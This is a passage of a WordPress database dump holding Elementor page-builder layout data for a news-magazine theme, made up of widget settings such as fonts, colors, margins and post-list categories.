\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1285,456,'_elementor_version','0.4'),(1286,456,'_elementor_css','a:3:{s:4:\"time\";i:1508894031;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1287,457,'_elementor_edit_mode','builder'),(1288,457,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\"